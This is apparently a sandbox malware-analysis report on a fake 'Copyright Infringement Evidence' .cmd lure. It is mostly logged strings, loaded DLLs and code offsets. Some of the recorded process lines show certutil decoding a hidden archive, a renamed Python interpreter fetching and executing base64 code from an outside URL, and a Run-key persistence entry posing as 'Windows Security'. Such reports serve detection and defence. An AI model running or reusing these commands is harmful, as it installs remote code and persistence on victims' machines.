Source: synaptics.exe, 0000000E.00000003.1979381178.000000000179B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974956581.0000000001796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: synaptics.exe, 0000000E.00000003.1867809289.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1879641191.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1872057233.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1824970526.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1888699521.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1989810343.0000000001637000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1923500924.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1998569141.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\python_tools.catJump to dropped file
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7F666014_2_6C7F6660
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7F0C4014_2_6C7F0C40
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7F00F014_2_6C7F00F0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7EA0C014_2_6C7EA0C0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7E9CA014_2_6C7E9CA0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7F037014_2_6C7F0370
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7EF55014_2_6C7EF550
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7F571014_2_6C7F5710
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7F059014_2_6C7F0590
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9A6F8014_2_6C9A6F80
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9A894014_2_6C9A8940
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9A5E8014_2_6C9A5E80
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9A4EC014_2_6C9A4EC0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9AC62014_2_6C9AC620
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C97628014_2_6C976280
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C97F6C014_2_6C97F6C0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C97730014_2_6C977300
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C97A52014_2_6C97A520
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C97677014_2_6C976770
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CB107C014_2_6CB107C0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA852B014_2_6CA852B0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA842E014_2_6CA842E0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9B0C7014_2_6C9B0C70
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAEDD7014_2_6CAEDD70
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAE16A014_2_6CAE16A0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAE08F014_2_6CAE08F0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA4DEB014_2_6CA4DEB0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA47B5014_2_6CA47B50
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA33EC014_2_6CA33EC0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA2F64014_2_6CA2F640
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA3778014_2_6CA37780
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA3879014_2_6CA38790
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA38BE014_2_6CA38BE0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9D6B1014_2_6C9D6B10
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAF2CE014_2_6CAF2CE0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAF222014_2_6CAF2220
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAFC23014_2_6CAFC230
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAF893014_2_6CAF8930
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAF270014_2_6CAF2700
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C97BFB014_2_6C97BFB0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C7F0F5014_2_6C7F0F50
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C582A7020_2_6C582A70
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C5824D020_2_6C5824D0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6C2E7020_2_6C6C2E70
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB00B20_2_6C6BB00B
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB0EE20_2_6C6BB0EE
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB0FF20_2_6C6BB0FF
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6C36F020_2_6C6C36F0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6C38C020_2_6C6C38C0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB0DD20_2_6C6BB0DD
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB16E20_2_6C6BB16E
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB16120_2_6C6BB161
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6C176020_2_6C6C1760
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB17F20_2_6C6BB17F
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB15020_2_6C6BB150
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB12E20_2_6C6BB12E
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB12120_2_6C6BB121
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB13F20_2_6C6BB13F
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6C3F0020_2_6C6C3F00
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB11020_2_6C6BB110
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB1E520_2_6C6BB1E5
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB1C320_2_6C6BB1C3
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB1A120_2_6C6BB1A1
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB1B220_2_6C6BB1B2
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB38B20_2_6C6BB38B
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB19020_2_6C6BB190
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C443020_2_6C7C4430
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C942020_2_6C7C9420
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C5CE020_2_6C7C5CE0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C7CD020_2_6C7C7CD0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CBC9020_2_6C7CBC90
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CCD6020_2_6C7CCD60
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C556020_2_6C7C5560
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C6D0020_2_6C7C6D00
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CA5C020_2_6C7CA5C0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C75A020_2_6C7C75A0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C667020_2_6C7C6670
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CB6A020_2_6C7CB6A0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CFF5020_2_6C7CFF50
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C71BF4020_2_6C71BF40
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C471020_2_6C7C4710
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CAFC020_2_6C7CAFC0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C81275020_2_6C812750
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CC7A020_2_6C7CC7A0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C379020_2_6C7C3790
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C903020_2_6C7C9030
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C81200220_2_6C812002
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C68A020_2_6C7C68A0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C989020_2_6C7C9890
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CA88020_2_6C7CA880
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CC15020_2_6C7CC150
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CC94020_2_6C7CC940
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C3A7020_2_6C7C3A70
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C72E020_2_6C7C72E0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C62C020_2_6C7C62C0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CBA8020_2_6C7CBA80
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CB34020_2_6C7CB340
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CA30020_2_6C7CA300
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CAB0020_2_6C7CAB00
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CCBC020_2_6C7CCBC0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7C63C020_2_6C7C63C0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C69E36020_2_6C69E360
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_73FC19C020_2_73FC19C0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C6BB00020_2_6C6BB000
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: String function: 6C693100 appears 36 times
Source: synaptics.exe.13.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.13.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.13.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f
Source: classification engineClassification label: mal68.winZIP@17/1408@1/1
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\Public\M20EKMMEH2Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" "
Source: C:\Users\user\Desktop\Rar.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Copyright Infringement Evidence - Images and Videos.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode DzbIZ1HRMj DzbIZ1HRMj.rar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Rar.exe Rar x -pAnfoE5FeC6R5dPfRbxQgKMtZdV6v0OKC -inul -y DzbIZ1HRMj.rar C:\Users\Public\M20EKMMEH2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\M20EKMMEH2\synaptics.exe "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\M20EKMMEH2\synaptics.exe "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode DzbIZ1HRMj DzbIZ1HRMj.rarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Rar.exe Rar x -pAnfoE5FeC6R5dPfRbxQgKMtZdV6v0OKC -inul -y DzbIZ1HRMj.rar C:\Users\Public\M20EKMMEH2Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\M20EKMMEH2\synaptics.exe "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\M20EKMMEH2\synaptics.exe "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))" Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: python310.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: python3.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: libcrypto-1_1.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: libssl-1_1.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: libcrypto-1_1.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: python310.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: python3.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: libcrypto-1_1.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: libssl-1_1.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Rar.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: DzbIZ1HRMj.zipStatic file information: File size 103157485 > 1048576
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: synaptics.exe, 0000000E.00000002.2138030231.000000006C87D000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdbAA source: synaptics.exe, 0000000E.00000002.2199979502.0000000073D53000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: synaptics.exe, 0000000E.00000002.2194130301.0000000073A83000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: synaptics.exe, 0000000E.00000002.2105183351.000000006C68C000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\bin\win32\python310.pdb source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2169516249.000000006CCC2000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: .pdbhqrY source: Rar.exe, 0000000D.00000003.1525205588.00000267F8FFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Rar.exe, 0000000D.00000000.1402748407.00007FF75F7D3000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Rar.exe, 0000000D.00000000.1402748407.00007FF75F7D3000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:35 2023 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: synaptics.exe, 0000000E.00000002.2138030231.000000006C87D000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: w.pdbit source: Rar.exe, 0000000D.00000003.1525205588.00000267F8FFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: synaptics.exe, 0000000E.00000002.2199979502.0000000073D53000.00000002.00000001.01000000.0000000C.sdmp
Source: libcrypto-1_1.dll.13.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.13.drStatic PE information: section name: .00cfg
Source: python310.dll.13.drStatic PE information: section name: PyRuntim
Source: mfc140u.dll.13.drStatic PE information: section name: .didat
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C859F10 push ecx; ret 14_2_6C859F23
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9A9CC4 push dword ptr [ebp+eax*2-18h]; ret 14_2_6C9A9CC9
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CB0F8BB push esp; iretd 14_2_6CB0F8BC
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA92C56 push ss; iretd 14_2_6CA92C58
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAEB8AC push eax; iretd 14_2_6CAEB8AD
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAEC4AA push edx; ret 14_2_6CAEC4AB
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CAECC4E push esp; iretd 14_2_6CAECC4F
